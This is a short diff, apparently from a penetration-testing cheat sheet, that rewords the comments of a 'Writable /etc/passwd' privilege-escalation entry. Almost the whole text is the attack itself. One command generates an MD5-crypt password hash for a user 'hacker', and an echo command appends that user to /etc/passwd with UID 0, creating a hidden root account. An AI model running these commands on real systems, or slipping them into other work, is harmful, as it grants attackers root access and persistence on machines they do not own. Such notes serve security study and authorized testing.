 Writable /etc/passwd

-# Generate password hash
+# Generate a password hash

 openssl passwd -1 -salt xyz hacker

-# Append to /etc/passwd
+# Append a new root user directly to /etc/passwd

 echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd